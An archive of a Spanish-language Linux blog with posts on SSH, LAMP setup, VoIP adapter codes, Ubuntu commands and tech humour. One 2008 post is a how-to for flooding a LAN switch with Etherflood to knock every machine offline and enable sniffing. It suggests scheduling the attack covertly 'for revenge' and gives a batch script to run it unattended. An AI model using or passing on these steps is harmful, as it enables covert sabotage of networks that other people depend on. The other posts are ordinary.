pg2mysql lo pueden encontrar en la siguiente dirección: http://www.lightbox.ca/pg2mysql.php

y pues les dejo algunos datos también por si hace la importación de sus bases de datos a mano:

Crear base de datos vacía para luego importar las tablas del script:
mysql> create database mibasededatos;

Importar el script :
usuario@mipc$ mysql -u usuario -p -h localhost mibasededatos < script.sql

Espero les sea de utilidad.

Agilizar login SSH en algunas distros

2013-01-07T11:21:00.001-07:00

En algunas distros por "default" existen algunas configuraciones en nuestro sistema que no usamos, y estas solo alentan los procesos que cotidianamente hacemos.

para ver que es lo que hace el ssh cuando tarda casi un minuto "pensando" tratándose de conectar, podemos conectarnos usando el modo verbose "-v" esto nos muestra realmente que está haciendo en cada momento y de ahí podemos determinar que eslo que está alentando el login a nuestros servidores.

villatux@sitco:~$ ssh -v root@midominio.com.mx
OpenSSH_5.8p1 Debian-7ubuntu1, OpenSSL 1.0.0e 6 Sep 2011
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Applying options for *
debug1: Connecting to midominio.com.mx [189.220.182.XXX] port 22.
debug1: Connection established.
debug1: identity file /home/villatux/.ssh/id_rsa type -1
debug1: identity file /home/villatux/.ssh/id_rsa-cert type -1
debug1: identity file /home/villatux/.ssh/id_dsa type -1
debug1: identity file /home/villatux/.ssh/id_dsa-cert type -1
debug1: identity file /home/villatux/.ssh/id_ecdsa type -1
debug1: identity file /home/villatux/.ssh/id_ecdsa-cert type -1
debug1: Remote protocol version 2.0, remote software version OpenSSH_4.3
debug1: match: OpenSSH_4.3 pat OpenSSH_4*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_5.8p1 Debian-7ubuntu1
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client aes128-ctr hmac-md5 none
debug1: kex: client->server aes128-ctr hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST(1024<1024 br="br" sent="sent">debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug1: Server host key: RSA 0b:3f:d4:5a:38:ce:90:9b:4c:3e:aa:e1:b5:fe:21:70
debug1: Host 'villatux.com.mx' is known and matches the RSA host key.
debug1: Found key in /home/villatux/.ssh/known_hosts:36
debug1: ssh_rsa_verify: signature correct
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: Roaming not allowed by server
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,gssapi-with-mic,password
debug1: Next authentication method: gssapi-with-mic
debug1: Unspecified GSS failure. Minor code may provide more information
Credentials cache file '/tmp/krb5cc_1000' not found

debug1: Unspecified GSS failure. Minor code may provide more information
Credentials cache file '/tmp/krb5cc_1000' not found

debug1: Unspecified GSS failure. Minor code may provide more information

debug1: Unspecified GSS failure. Minor code may provide more information

debug1: Next authentication method: publickey
debug1: Trying private key: /home/villatux/.ssh/id_rsa
debug1: Trying private key: /home/villatux/.ssh/id_dsa
debug1: Trying private key: /home/villatux/.ssh/id_ecdsa
debug1: Next authentication method: password
root@midominio.com.mx's password:

En la salida anterior vemos que esta tratando de conectarse con autenticación kerberos:

debug1: Unspecified GSS failure. Minor code may provide more information
Credentials cache file '/tmp/krb5cc_1000' not found

Si no tenemos un servidor kerberos disponible va a hacer el maximo de intentos para lograr la conexión , y como no tenemos un servidor kerberos, pues solo desabilitamos esa opción en nuestro /etc/ssh/ssh_config de esta manera:

Donde dice:
GSSAPIAuthentication yes
Lo cambié por:
GSSAPIAuthentication no

Y ahora el ssh se conecta inmediatamente, como siempre debió haber sido.

Códigos de configuración SPA2102 y similares

2012-12-20T11:04:00.005-07:00

Estos son los códigos de configuraciones de los Adaptadores telefónicos , se los pasó para aquellos que configuran, sistemas telefónicos con Asterisk,

ACTION	DIGITS	CHOICES	DESCRIPTION
Enter Interactive Voice Response Menu	****		Use this command to enter the Interactive Voice Response Menu. Do not press any other keys until you hear, “Linksys configuration menu. Please enter the option followed by the # (pound) key or hang up to exit.”
Check Internet Connection Type	100		Hear the Internet connection type of the Phone Adapter.
Check Internet IP Address	110		Hear the IP address assigned to the Phone Adapter’s Internet (external) interface.
Check Network Mask (or Subnet Mask)	120		Hear the network or subnet mask assigned to the Phone Adapter.
Check Gateway IP Address	130		Hear the IP address of the Phone Adapter (usually the network router).
Check MAC Address	140		Hear the MAC address of the Phone Adapter in hexadecimal string format.
Check Firmware Version	150		Hear the version number of the firmware currently running on the Phone Adapter.
Check Primary DNS Server IP Address	160		Hear the IP address of the primary DNS (Domain Name Service) server.
Check Internet Web Server Port	170		Hear the port number of the Internet Web server used for the Web-based Utility.
Check Local IP Address	210		Hear the local IP address of the Phone Adapter.
Set Internet Connection Type	101	Press 0 to use DHCP. Press 1 to use a static IP address. Press 2 to use PPPoE.	Select the type of Internet connection you are using. Refer to the documentation supplied by your Internet Service Provider (ISP).
Set Static IP Address	111	Enter the IP address using numbers on the telephone keypad. Use the * (star) key when entering a decimal point.	First, set the Internet Connection Type to static IP address; otherwise, you will hear, “Invalid Option,” if you try to set the static IP address.
Set Network (or Subnet) Mask	121	Enter the network or subnet mask using numbers on the telephone keypad. Use the * (star) key when entering a decimal point.	First, set the Internet Connection Type to static IP address; otherwise, you will hear, “Invalid Option,” if you try to set the network or subnet mask.
Set Gateway IP Address	131	Enter the IP address using numbers on the telephone keypad. Use the * (star) key when entering a decimal point.	First, set the Internet Connection Type to static IP address; otherwise, you will hear, “Invalid Option,” if you try to set the gateway IP address.
Set Primary DNS Server IP Address	161	Enter the IP address using numbers on the telephone keypad. Use the * (star) key when entering a decimal point.	First, set the Internet Connection Type to static IP address; otherwise, you will hear, “Invalid Option,” if you try to set the IP address of the primary DNS server.
Set the Mode	201	Press 0 to select the router/NAT mode. Press 1 to select the bridge/switch mode.	f the Phone Adapter acts as the router for your network, use the router/NAT mode. If your network already has a router, use the bridge/switch mode.
Enable/Disable WAN Access to the Web-based Utility	7932	Press 1 to enable. Press 0 to disable.	Use this setting to enable or disable WAN access to the Web-based Utility. (This Utility lets you configure the Phone Adapter.)
Manual Reboot	732668		After you hear, “Option successful,” hang up the phone. The Phone Adapter will automatically reboot.
Factory Reset	73738	Press 1 to confirm. Press * (star) to cancel.	If necessary, enter the password. The Phone Adapter will request confirmation; enter 1 to confirm. You will hear, “Option successful.” Hang up the phone. The Phone Adapter will reboot, and all settings will be reset to their factory default settings.
User Factory Reset	877778	Press 1 to confirm. Press * (star) to cancel.	The Phone Adapter will request confirmation; enter 1 to confirm. You will hear, “Option successful.” Hang up the phone. The Phone Adapter will reboot and all user-configurable settings will be reset to their factory default settings.

Entering a Password

You may be prompted to enter a password when you want to reset the Phone Adapter to its factory default settings. To enter the password, use the phone’s keypad, and follow the appropriate instructions.

• To enter A, B, C, a, b, or c — press 2.
• To enter D, E, F, d, e, or f — press 3.
• To enter G, H, I, g, h, or i — press 4.
• To enter J, K, L, j, k, or l — press 5.
• To enter M, N, O, m, n, or o — press 6.
• To enter P, Q, R, S, o, q, r, or s — press 7.
• To enter T, U, V, t, u, or v — press 8.
• To enter W, X, Y, Z, w, x, y, or z — press 9.
• To enter all other characters, press 0.

Espero les sea de utilidad..

Instalación rapida de servidor web "LAMP"

2012-09-30T21:44:00.003-06:00

-->
Una de las combinaciones de software mas populares en LINUX es la conocida como LAMP (Linux Apache MySQL PHP) que básicamente es un servidor web con base de datos.

Este pequeño manual, les puede servir para montar rápidamente un servidor web en muy pocos pasos, ya que en muchas ocasiones es necesario montar un servicio web ya sea por motivos de trabajo o escolares.

INSTALACIÓN:

para la instalación lo vamos a hacer en un Linux Ubuntu y se puede hacer esto en todas las distribuciones Linux derivadas de Debian.

Abrimos nuestra terminal de linux y estando como super usuario instalamos la utilidad que nos muestra una interfaz simple para usuarios “tasksel” , y con ella instalar grupos de programas para fines específicos. En este caso nuestra finalidad es instalar un servidor web (LAMP)

1) Instalamos la aplicación tasksel con el siguiente comando:
#apt-get install tasksel

2) Despues de tener instalado tasksel, lo ejecutamos:
#tasksel

y con esto nos mostrará un menú parecido a esto:

3) seleccionamos “LAMP Server” con nuestro teclado usando las flechas y barra espaciadora para seleccionar.

4) Terminando la instalación nos podemos dar cuenta que ya tenemos instalado nuestro servidor web, tan solo abriendo nuestro navegador y tecleando la dirección “http://localhost” ahi nos deberá aparecer algo como “It Works!” que es la pagina de prueba que tiene por default Apache.

También podemos comprobar que tenemos instalado php creando en nuestro directorio web (normalmente es /var/www) un archivo llamado phpinfo.php con el contenido:

<?php
 phpinfo();
?>

seguido de esto en el navegador tecleamos la dirección: http://localhost/phpinfo.php y nos deberá mostrar algo parecido a esto:

Instalación de phpmyadmin

5) Para una administración mas amigable de nuestras bases de datos podemos instalar una interfaz web para ello. En este caso la aplicacioón se llama “phpmyadmin” y la podemos instalar con el siguiente comando:

#apt-get install phpmyadmin

terminando este proceso podemos comprobar la funcionalidad abriendo nuestro navegador y escribiendo la siguiente dirección: http://localhost/phpmyadmin y firmándonos para acceder. En este caso verás algo como esto:

Cualquier comentario o duda estoy a disposición

Peticiones web con la librería libwww-perl y manipular resultados.

2012-09-21T00:43:00.003-06:00

libwww-perl es una librería que nos provee de una interfaz para desarrollar clientes web, pero en esta ocasión lo usaremos solo para hacer peticiones web hacia una pagina en un servidor web local y mostrar el resultado en la terminal mediante un script en bash.

Esto puede servir para alguna aplicación sencilla que se les ocurra, por ejemplo yo hice una aplicacion tipo "bloqueo de pc" para cibercafés utilizando esta librería.

Para esto tenemos que tener instalado:
* Un servidor web (puede ser apache ó cherokee)
* Tener instalado la libreria libwww-perl
si no la tienes instalada la puedes instalar con el siguiente comando:
#apt-get install libwww-perl

Luego de tener todo instalado colocamos un archivo index.php en nuestro servidor web, con el siguiente contenido:


<?php echo 0; ?>

También creamos otro archivo llamado peticion.sh con el siguiente contenido:


#!/bin/bash

ESTADO=$(GET http://127.0.0.1/index.php)

 if [ "$ESTADO" = 0 ]

 then
    
  echo "es cero" 

else
    
 echo "es uno"

fi

Damos permisos de ejecución a nuestro script:
#chmod +x peticion.sh

Ejecutamos el script :
#./peticion.sh

esto nos devolverá un resultado como si visitáramos la pagina mediante nuestro navegador web, el cual nos daría como resultado el visualizar un "0" en una pagina en blanco, ya que estamos usando la petición "GET" para consultar, y seguido de esto comprobamos si la consulta es igual a cero, nos devolverá como resultado "es cero" y si no es cero lo que nos muestra la consulta, nos devolverá como resultado "no es cero"

Espero que les sea de utilidad esta librería que tiene muchos más usos que el que le estamos dando en este post, si tienen alguna pregunta me la pueden hacer llegar con confianza ..

De regreso..

2012-09-16T19:12:00.000-06:00

Después de tres años de ausencia, he decidido empezar de nuevo a postear con regularidad en este espacio y con ganas de seguir promocionando el uso de GNU/Linux además de las experiencias , tutoriales importantes que les pueden ser de mucha ayuda a principiantes.

Festival GNU 2008 en Chihuahua

2008-09-20T16:28:00.000-06:00

Los días 2, 3 y 4 de Octubre se llevará a cabo una serie de conferencias con grandes exponentes y activistas de la comunidad GNU/LINUX. Estas conferencias tendrán sede en el edificio de Seminarios de la facultad de Contaduría y Administración de la UACH.

* No tendrá consto alguno
* Para asistir es necesario registrarse en la web oficial
* Si tienes alguna pregunta, no dudes en hacerla en el formulario de la pagina

La pagina oficial es: http://festivalgnu.fca.uach.mx/

Ayá nos vemos !!

Cliente SSH y TELNET para tu celular

2008-07-26T21:56:00.000-06:00

Aqui les traigo una manera muy facil y divertida de controlar sus computadoras con Linuz-Mac o cualquier sistema operativo que tenga el puerto 22 (SSH) a la escucha.

En realidad esto es muy facil, tanto que no te toma mas de 5 minutos en configurarlo, solo necesitas:

CLIENTE:
* Celular con soporte para java
* Aplicacion MidpSSH (cliente SSH y TELNET)

SERVIDOR:
*Computadora con servidor ssh
* puerto 22 a la escucha

Tienen que tener muy en cuenta lo siguiente, dependiendo de la forma, es decir el dispositivo que uses para conectarte a internet tiene que asegurarte que tu demonio sea visto desde "afuera" de la red hacia internet, el termino clave de esta cuestion es NAT, es decir que las direcciones sean traducidas, para esto hay que manosear nuestro router o lo que sea que uses para conectarte a internet (en otras palabras usuarios de Cablemas que tengan el cablemodem con una ip interna tipo 10.b.c.d no podran hacerlo) con el objeto de hacer que nuestra maquina y mas especificamente este servicio sea visto desde "afuera" y no solamente dentro de la red local.

El programa que vamos a usar es el MidpSSH que está en descarga gratuita de la pagina oficial: http://www.xk72.com/midpssh/index.php , luego conectas el cel a la compu y copias el jar, lo instalas y ahora pasamos a la configuracion del programa dentro del celular.
Una vez que lo tienes instalado lo abres, te vas a "Sessions" y creas una sesion nueva:
---En Alias pones el nombre que quieras.

---Ahora en host pones tu direccion ip externa no la de tu maquina, tiene que ser la externa. Atencion aquí, esta no es la idea, aqui se pierde mucho la simplicidad de la cuestion porque tendriamos que estar sabiendo nuestra ip todo el tiempo he aqui la importancia de registrarnos en www.dyndns.com es gratis y ademas es muy util cuando estamos lejos de nuestra compu y queremos encontrarla porque necesitamos algo.

--- En type seleccionamos SSH

--- Luego username y password esta bastante claro lo que es guardamos todo y seleccionamos la sesion recien creada, nos pregunta si le damos permiso para que el programa se conecte a internet y le ponemos que si y dependiendo como este el trafico de la red se toma unos segundos y luevo vemos la pantalla de bienvenida de la terminal de nuestra shell ssh remota y tenemos en el caso de habernos conectado como root un acceso total a nuestra maquina desde donde sea que estemos y listo, ahora a vaciar todos los comandos que sepamos sobre el celular ..XD

Salu2!

El problema que tienen los que saben de computadoras ..XD

2008-06-28T15:08:00.000-06:00

El problema mas comun que tienen los que saben de computadoras ..

Yo no sufro tanto de este problema (yo si cobro ..XD)

Salu2..

Si Apple vendiera automoviles ..XD

2008-06-22T19:38:00.001-06:00

Coleccion de comerciales LINUX

2008-06-13T14:00:00.000-06:00

D.O.S ( Denial Of Service) a redes Lan

2008-06-08T15:35:00.000-06:00

¡Saludos!, Hoy quiero explicarles otro Ataque de tipo “Denegación de Servicio” (D.O.S.), Si bien, ya he explicado en qué consisten los ataques D.O.S, Aunque les debo un post para tocarlos “más a fondo”.

El ataque de hoy funciona en sistemas Win2000, WinXP y Win2003, y es algo destructivo , (como todos los ataques D.O.S.), pero éste tiene algo en particular, y es que no hay (ó por lo menos no conozco) defensa posible contra él (Si conoces alguna por favor infórmame al respecto), Una vez que empezó, nadie lo detiene, veamos de qué hablo.

Éste tipo de ataque es bastante viejo y nada “ético”, era usado para colapsar el Switch de una Red con direcciones aleatorias Ethernet, y esto causa que algunos Switches empiecen a enviar el tráfico de paquetes a todos los puertos de la LAN, Es decir, hacemos que el Switch funcione como un Hub, para poder nosotros aprovecharnos de esa y Sniffar la Red.

NO voy a enseñar en éste post a cómo Sniffar, eso tocará después, simplemente quiero mostrarles lo fácil que es “Denegarle el servicio” de Internet a una Red Ethernet.

Bien, para colapsar el Switch, necesitaremos un programa llamado Etherflood, “Ether” viene de “Ethernet” y “Flood” de “Inundación”, y lo podemos conseguir directamente aquí

Bien, para lograr que nuestro “Monstrico” funcione, tenemos que agregarle un Driver a la máquina que Infectaremos (Ojo nada permanente, nosotros sabremos parar “la infección” perfectamente), para que ésta ataque al resto de la red, les enseñaré a configurarlo:
Al descomprimirnos Etherflood, tendremos 3 archivos, los cuales son:
1 archivo .sys Archivo de sistema.
1 archivo .exe Nuestro monstruo 8) .
1 archivo .inf el Driver. Bien, instalemos el Driver, para eso vayamos al Panel de control y de ahí nos vamos a “Conexiones de red”, como esto ataca redes Ethernet, seleccionamos “Conexión de área local”, le damos clic secundario y clickeamos sobre Propiedades, justo como en la imagen:

En las propiedades de conexión de área local, clickeamos sobre el botón “Instalar”, en la ventana que nos saldrá, seleccionamos “Protocolo” y clickeamos en “Agregar”:
Ahora saldrá otra ventana llamada “Seleccionar el protocolo de red”, ahí clickeamos sobre “Utilizar disco”, esto a su vez nos llevará a otra ventana en la cual vamos a clickear sobre el botón “Examinar..” buscamos el directorio donde descomprimimos a Etherflood y ahí seleccionamos el Driver llamado “EthDrv.inf” listo, le damos a “Aceptar” a todo y cerramos las “Propiedades de conexión de área local” y estamos listos para atacar.

Etherflood funciona bajo Shells, así que abrimos una y nos dirigimos hacia donde está nuestro programa, y una vez ahí escribimos:

C:\Etherflood\>etherflood

Y nos saldrá lo siguiente:
Nos está pidiendo la autorización para el ataque , es decir, indicarle nuestra tarjeta de red, escribimos lo siguiente:

C:\Etherflood\>1

Pulsamos Enter, y empezará el desastre, la inundación y el colapso del Switch de la red .

Ningún ordenador conectado al Switch podrá acceder a servicios de red mientras nosotros estemos atacando, pero ¡Espera! Hay algo que canta, el Mismo Switch, ¿Alguna vez has visto un arbolito de Navidad con las luces encendidas al ritmo de la música de “I wish you a merry christmas”?, bueno, exactamente lo mismo pasará pero los LEDs del Switch bailarán al ritmo del la inundación de direcciones Ethernet :lol: :lol: , si el Administrador ó cualquier persona pasa cerca, lo más seguro es que se den cuenta, pero igual no sabrán qué está pasando ni qué ordenador está atacando :shock: , así hemos provocado un Denial Of Service.

Esto serviría de venganza, podríamos programar el Administrador de tareas de Windows para que a una hora determinada inunde el Switch de la red, ó bien con el comando AT de Windows, ó agregar un nuevo valor en el Registro :badgrin: , pero recuerden, La idea no es dañar sino aprender.

¿Ejecutarlo sin intervención Humana?

Claro que es posible, aquí les dejo un Script Batch para eso, para que "A tal hora" un programa por ahí llamado Etherflood se ejecute sin necesidad de alguien que le indique el parámetro "1".

Cita:

@echo off
@echo 1 | C:\Etherflood\etherflood.exe

¿Para parar el ataque?
¡Hombre! Sólo cierra la shell que está atacando ó presiona ctrl. + C, ó si la ejecutaste en modo oculto, termina el proceso por Taskkill.

Pagina de seguridad para practicar hacking (Starfleet Academy)

2008-05-27T10:09:00.000-06:00

Aqui les dejo una pagina de seguridad informatica (http://isatcis.com/ ), realmente interesante para hackers, webmasters, y aficionados al hacking.

En esta pagina tienes la opotunidad de aprender y mejorar los conocimiento sobre la seguridad de internet Legalmente. en esta web tendras que aplicar las tacticas mas utilizadas de busqueda de bugs en 16 niveles de seguridad

Reglas:

*Utilizar Mozilla firefox como navegador para las practicas de seguridad (fue optimizado para este navegador)

* Se recomienda encarecidamente el establecimiento de su navegador de Internet a "Active Scripting"

* tratar de crackear o buscar bugs mas aya de los establecidos por los niveles de seguridad permitidos por el administrador ESTA PROHIBIDO

* Brute force, (fuerza bruta), o solisitar paginas excesivas desde el navegador ESTA PROHIBIDO (ten en cuenta que esto no es necesario para explotar los bugs de la web)

* Dar soluciones a los niveles, contraseñas o cualquier sourcecodes ESTA PROHIBIDO.

* Dar enlaces a herramientas necesarias para un nivel ESTA PROHIBIDO.

una sugerencia :
revisar codigo fuente ..XD

saludos y que tengan un buen hacking ..XD

El rap del diseñador web

2008-05-25T11:20:00.000-06:00

The SEO Rapper - Design, Coding

Your site design is the first thing people see
it should be reflective of you and the industry
easy to look at with a nice navigation
when you can't find what you want it causes frustration
a clear Call to action to increase the temptation
use appealing graphics they create motivation
if you have animation please use with moderation
cause search engines can't index the information
display the logos of all your associations
highlight your contact info that's an obligation
create a clean design you can use some decoration
but to try to prevent any client hesitation
every page that they click should provide an explanation
should be easy to understand like having a conversation
when you design the style go ahead and use your imagination
but make sure you use correct color combinations
do some investigation, look at other organizations
but don't duplicate or you might face a litigation
you are done? congratulations, start construction
move into production, please follow these instructions
your photoshop functions? then slice that design
do your layout with divs make sure that it's aligned
please don't use tables even though they work fine
when it come to indexing they give searches a hard time
make it easy for the spiders to crawl what you provide
remove font type, font color and font size
no background colors, keep your coding real neat,
tag your look and feel on a separate style sheet
better results with xml and css
now you making progress, a lil closer to success
describe your doctype so the browser can relate
make sure you do it great or it won't validate
check in all browsers, I do it directly
gotta make sure that it renders correctly
some use IE, some others use Flock
some use AOL, I use Firefox
title everything including links and images
don't use italics, use emphasis
don't use bold, please use strong
if you use bold that's old and wrong
when you use CSS, you page will load quicker
client satisfied like they eating on a snicker
they stuck on your page like you made it with a sticker
and then they convert now that's the real kicker
make you a lil richer, your site a lil slicker
design and code right man I hope you get the picture
what I'm telling you is true man it should be a scripture
if it's built right you'll be the pick of the litter
everyone will want to follow you like twitter
competition will get bitter and you'll shine like glitter
if you trying to grow your company will get bigger
design and code right man can you get with it

El rapero SEO - Diseña, escribe código

El diseño de tu web es lo primero que ve la gente
debería reflejar lo que eres y tu industria
agradable de ver y con buena navegación
no encontrar lo que buscas causa frustración
una llamada a la acción para aumentar la tentación
usa gráficos atractivos, crean motivación
si usas animaciones, por favor, hazlo con moderación
porque los buscadores no pueden indexar la información
muestra los logos de todas tus asociaciones
descata tu información de contacto, es una obligación
crea un diseño limpio, puedes usar alguna decoración
pero intenta evitar la vacilación de los clientes
cada página en la que hacen clic debería mostrar una explicación
debería ser fácil de entender, como tener una conversación
cuando diseñes el estilo usa tu imaginación
pero asegurate de usar combinaciones de colores adecuadas
investiga algo, echa un vistazo a otras organizaciones
pero no plagies o puedes enfrentarte a un juicio
¿has terminado? felicidades, empieza a construir
después a producción, por favor sigue estas instrucciones
¿funciona en photoshop? entonces sigue con ese diseño
usa divs para componer, asegurate de que está alineado
por favor no uses tablas aunque funcione con ellas
cuando se trata de indexar dan problemas a los buscadores
facilita a los spiders indexar tus páginas
elimina el font-type, font-color y font-size
nada de background-color, mantén tu código limpio,
conserva el aspecto en una hoja de estilo
tendrás mejores resultados con xml y css
ahora haces progresos, estás un poco más cerca del éxito
describe tu doctype para que el navegador lo pueda identificar
asegurate de que lo haces todo bien o no validará
prueba la web en todos los navegadores
hay que asegurarse de que se ve correctamente
algunos usan IE, otros usan Flock
unos AOL, yo uso Firefox
añade un title a todo, incluyendo enlaces e imágenes
no uses itálicas, usa énfasis (NT: em en lugar de it)
no uses bold, por favor, usa strong (NT: strong en lugar de b)
usar bold es antiguo y erróneo
al usar CSS, tu página carga más rápido
los clientes están satisfechos
se quedan en tu página como si tuviera adhesivo
y logras una conversión, eso es lo realmente importante
hacerte un poco más rico
diseña y escribe código bien, colega, espero que lo hayas cogido
lo que te digo es cierto, debería ser tu biblia
si está bien desarrollado serás al que escojan
todo el mundo querrá seguirte, como twitter
la competencia se joderá y brillarás como el oro
si intentas crecer tu compañía se hará más grande
diseña y escribe código bien, colega, lo puedes hacer

FUENTE

Comandos Utiles para Ubuntu

2008-05-24T19:06:00.000-06:00

Algunos comandos utiles que pueden ser utiles a la hora de administrar nuestros sistemas con Ubuntu .. XD

Comando Para Privilegios.

sudo command – ejecuta command como raíz
sudo su – abrir shell raíz
sudo su user – abrir shell como usuario
sudo -k – olvidar tu contraseña sudo
gksudo command – visual sudo dialog (GNOME)
kdesudo command – visual sudo dialog (KDE)
sudo visudo – editar /etc/sudoers
gksudo nautilus – gestor ficheros raíz (GNOME)
kdesudo konqueror – gestor ficheros raíz (KDE)
passwd – cambiar tu contraseña

Comandos Network

ifconfig – muestra información de red
iwconfig – muestra información de wireless
sudo iwlist scan – escanea redes inalámbricas
sudo /etc/init.d/networking restart – resetear la red
(archivo) /etc/network/interfaces – configuración manual
ifup interface – traer interface online
ifdown interface – deshabilitar interface

Comandos de Display

sudo /etc/init.d/gdm restart – resetear X (Gnome)
sudo /etc/init.d/kdm restart – resetear X (kDE)
(archivo) /etc/X11/xorg.conf – mostrar Configuracion
sudo dpkg-reconfigure -phigh xserver-xorg – resetear configuración X
Ctrl+Alt+Bksp – resetear X display si quedo tildado
Ctrl+Alt+FN – cambiar a tty N
Ctrl+Alt+F7 – cambiar de nuevo a X display

Comandos de Servicio del Sistema

start service – iniciar trabajo service (Upstart)
stop service – parar trabajo service (Upstart)
status service – comprobar si service está ejecutando (Upstart)
/etc/init.d/service start – iniciar service (SysV)
/etc/init.d/service stop – parar service(SysV)
/etc/init.d/service status – comprobar service(SysV)
/etc/init.d/service restart – resetear service(SysV)
runlevel – obtener runlevel actual

Comandos para Cortafuegos

ufw enable – activar el cortafuegos
ufw disable – apagar el cortafuegos
ufw default allow – permitir todas las conexiones por defecto
ufw default deny – bloquear todas las conexiones por defecto
ufw status – reglas y estado actual
ufw allow port – permitir tráfico en puerto
ufw deny port – bloquear puerto
ufw deny from ip – bloquear dirección ip

Comandos de Sistema

recovery – Escribir “REISUB” mientras se mantiene Alt y SysRq (PrintScrn) con aprox. 1 segundo entre cada letra. Tu sistema reiniciará
lsb_release -a – obtener la versión de Ubuntu
uname -r – obtener versión del kernel
uname -a – obtener toda la información del kernel

Comandos para Gestor de Paquetes

apt-get update – refrescar actualizaciones disponibles
apt-get upgrade – actualizar todos los paquetes
apt-get dist-upgrade – actualizar versión
apt-get install pkg – instalar pkg
apt-get remove pkg – desinstalar pkg
apt-get autoremove – eliminar paquetes obsoletos
apt-get -f instal – intentar arreglar paquetes
dpkg –configure -a – intentar arreglar paquetes rotos
dpkg -i pkg.deb – instalar archivo pkg.deb
(archivo) /etc/apt/sources.list – lista de repositorios APT

Comandos Para Paquetes Especiales

ubuntu-desktop – Entorno Ubuntu estándar
kubuntu-desktop – escritorio KDE
xubuntu-desktop – escritorio XFCE
ubuntu-minimal – núcleo utilidades Ubuntu
ubuntu-standard – utilidades estándar Ubuntu
ubuntu-restricted-extras – no libres, pero utiles
kubuntu-restricted-extras – ídem KDE
xubuntu-restricted-extras – ídem XFCE
build-essential – paquetes usados para compilar
linux-image-generic – última imagen genérica del kernel
linux-headers-generic – últimas cabeceras

Comandos de Aplicaciones

nautilus – gestor de ficheros (GNOME)
dolphin – gestor de ficheros (KDE)
konqueror – Navegador web (KDE)
kate – editor de texto (KDE)
gedit – editor de texto (GNOME)

fuente: http://gndx.org/?p=249

Ballmer mal recibido en Budapest

2008-05-24T10:09:00.000-06:00

.. .

le llovieron guevazos a Steve Ballmer cuando iniciaba una conferencia, a causa de esto se tuvo que esconder detraz del estrado para protegerse del atacante, que le gritaba:"Microsoft devuelva el dinero de los contribuyentes", protestaba contra el reciente acuerdo firmado entre esa empresa informática y el gobierno húngaro.